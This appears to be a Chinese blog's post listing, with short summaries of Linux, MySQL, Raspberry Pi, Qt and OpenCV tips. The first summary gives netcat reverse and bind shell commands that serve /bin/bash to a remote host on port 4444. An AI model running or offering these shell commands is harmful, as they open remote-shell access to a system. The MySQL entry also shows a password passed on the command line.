摘要:
反向 1.控制端:nc -lvp 4444 2.被控制端:nc 控制端IP 4444 -e /bin/bash 正向 1.被控制端:nc -lvp 4444 -e /bin/bash 2.控制端:nc 被控制端ip 4444 阅读全文
摘要:
sudo apt-get install lirc /etc/lirc/lirc_options.conf In GPIO20 OUT GPIO21 dtoverlay=lirc-rpi,gpio_out_pin=21,gpio_in_pin=20 阅读全文
摘要:
nohup mysql -u sa -pabcd1234 -e 'source /db.sql' & 阅读全文
摘要:
#!/bin/sh while true; do processExist=`ps aux | grep xxx | grep -v "grep" ` if [ -z "$processExist" ];then echo "proecss is restarted" cd /MyData/xxx nohup sh xxx.sh & else echo "process is r... 阅读全文
摘要:
crontab记录日志 修改rsyslog sudo vim /etc/rsyslog.d/50-default.conf cron.* /var/log/cron.log #将cron前面的注释符去掉 重启rsyslog sudo service rsyslog restart sudo serv 阅读全文
摘要:
getconf LONG_BIT 32 64 阅读全文
摘要:
安装了qt4和qt5 /usr/lib/x86_64-linux-gnu/qt-default/qtchooser 的default.conf 第一行改成自己qmake的bin路径即可 阅读全文
摘要:
rm -rf ~/.config/lxpanel/LXDE-pi 阅读全文
摘要:
ag:比grep、ack更快的递归搜索文件内容。 tig:字符模式下交互查看git项目,可以替代git命令。 mycli:mysql客户端,支持语法高亮和命令补全,效果类似ipython,可以替代mysql命令。 jq: json文件处理以及格式化显示,支持高亮,可以替换python -m json 阅读全文
摘要:
mkdir hello helloworld.cpp 生成了Makefile make 阅读全文
摘要:
show variables like '%secure%'; 看看导出位置 SELECT * FROM tb WHERE sn = '1' LIMIT 1,10into outfile '/var/lib/mysql-files/SPH.txt' 阅读全文
摘要:
源码 qt-everywhere-src-5.11.3 依赖 apt-get install bison build-essential gperf flex ruby python libasound2-dev libbz2-dev libcap-dev \libcups2-dev libdrm- 阅读全文
摘要:
import cv dir(cv) ['16SC', '16UC', '32FC', '32SC', '64FC', '8SC', '8UC', 'Abs', 'AbsDiff', 'AbsDiffS', 'Acc', 'AdaptiveThreshold', 'Add', 'AddS', 'Add 阅读全文
摘要:
1. 在当前用户根目录下建立.pip文件夹 mkdir ~/.pip2.在.pip文件夹下创建文件pip.conf,并追加内容 [global]trusted-host=mirrors.aliyun.comindex-url=http://mirrors.aliyun.com/pypi/simple 阅读全文
摘要:
import cv2 import numpy as np import sys from PyQt5.QtGui import * from PyQt5.QtCore import * from PyQt5.QtWidgets import * import datetime class Video(): def __init__(self, capture): s... 阅读全文